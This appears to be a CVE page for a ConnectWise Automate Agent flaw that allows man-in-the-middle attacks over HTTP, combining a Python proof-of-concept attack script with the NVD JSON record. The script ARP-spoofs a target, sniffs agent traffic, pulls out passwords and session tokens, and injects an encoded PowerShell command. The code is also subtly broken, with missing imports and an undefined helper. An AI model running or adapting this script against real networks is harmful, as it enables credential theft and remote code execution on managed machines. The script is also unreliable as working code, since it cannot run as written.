CVE-2025-11492

# CVE-2025-11492 - ConnectWise Automate Agent MITM Attack PoC # This PoC demonstrates how an attacker can intercept and modify # HTTP-based communications between ConnectWise Automate Agent and Server import socket import struct import threading from scapy.all import ARP, Ether, srp, sniff, IP, TCP, Raw # Step 1: ARP Spoofing to perform MITM def arp_spoof(target_ip, gateway_ip): """Perform ARP spoofing to redirect traffic through attacker""" target_mac = get_mac(target_ip) gateway_mac = get_mac(gateway_ip) # Craft ARP reply packets packet = Ether(dst=target_mac, src=get_mac('attacker')) / \ ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip, hwsrc=get_mac('attacker')) sendp(packet, verbose=False) print(f"[*] ARP spoofing: {target_ip} <-> {gateway_ip}") # Step 2: Intercept HTTP Communications def intercept_agent_traffic(packet): """Intercept and analyze ConnectWise Automate Agent HTTP traffic""" if packet.haslayer(Raw) and packet.haslayer(TCP): payload = packet[Raw].load.decode('utf-8', errors='ignore') # Detect ConnectWise Automate Agent communication patterns if 'ConnectWise' in payload or 'Automate' in payload: print(f"[+] Intercepted Agent Communication:") print(f" Source: {packet[IP].src}:{packet[TCP].sport}") print(f" Dest: {packet[IP].dst}:{packet[TCP].dport}") print(f" Payload: {payload[:200]}...") # Extract credentials and session tokens extract_credentials(payload) # Attempt to modify commands (command injection) modified_payload = inject_malicious_command(payload) return modified_payload return None # Step 3: Extract sensitive data from intercepted traffic def extract_credentials(payload): """Extract authentication credentials from HTTP traffic""" patterns = { 'username': r'username=([^&\s]+)', 'password': r'password=([^&\s]+)', 'session_token': r'token=([^&\s]+)', 'machine_id': r'machineId=([^&\s]+)' } for key, pattern in patterns.items(): match = re.search(pattern, payload) if match: print(f"[!] Found {key}: {match.group(1)}") # Step 4: Inject malicious commands def inject_malicious_command(payload): """Inject malicious commands into agent-server communication""" malicious_cmd = "<script>exec('powershell -enc <base64_payload>');</script>" if '<command>' in payload: payload = payload.replace('</command>', f'{malicious_cmd}</command>') print(f"[!] Injected malicious command into payload") return payload # Main execution if __name__ == "__main__": TARGET_IP = "192.168.1.100" # ConnectWise Agent IP GATEWAY_IP = "192.168.1.1" # Network Gateway # Enable IP forwarding os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") # Start ARP spoofing arp_spoof(TARGET_IP, GATEWAY_IP) # Start sniffing and intercepting sniff(filter="tcp port 80", prn=intercept_agent_traffic, store=0)

{"cve": {"id": "CVE-2025-11492", "sourceIdentifier": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "published": "2025-10-16T19:15:31.900", "lastModified": "2025-10-29T19:33:29.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the ConnectWise Automate Agent, communications could be configured to use HTTP instead of HTTPS. In such cases, an on-path threat actor with a man-in-the-middle network position could intercept, modify, or replay agent-server traffic. Additionally, the encryption method used to obfuscate some communications over the HTTP channel is updated in the Automate 2025.9 patch to enforce HTTPS for all agent communications."}], "metrics": {"cvssMetricV31": [{"source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:connectwise:automate:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.9", "matchCriteriaId": "B9CC280B-C83A-422E-B637-44F4051703F0"}]}]}], "references": [{"url": "https://www.connectwise.com/company/trust/security-bulletins/connectwise-automate-2025.9-security-fix", "source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "tags": ["Vendor Advisory"]}]}}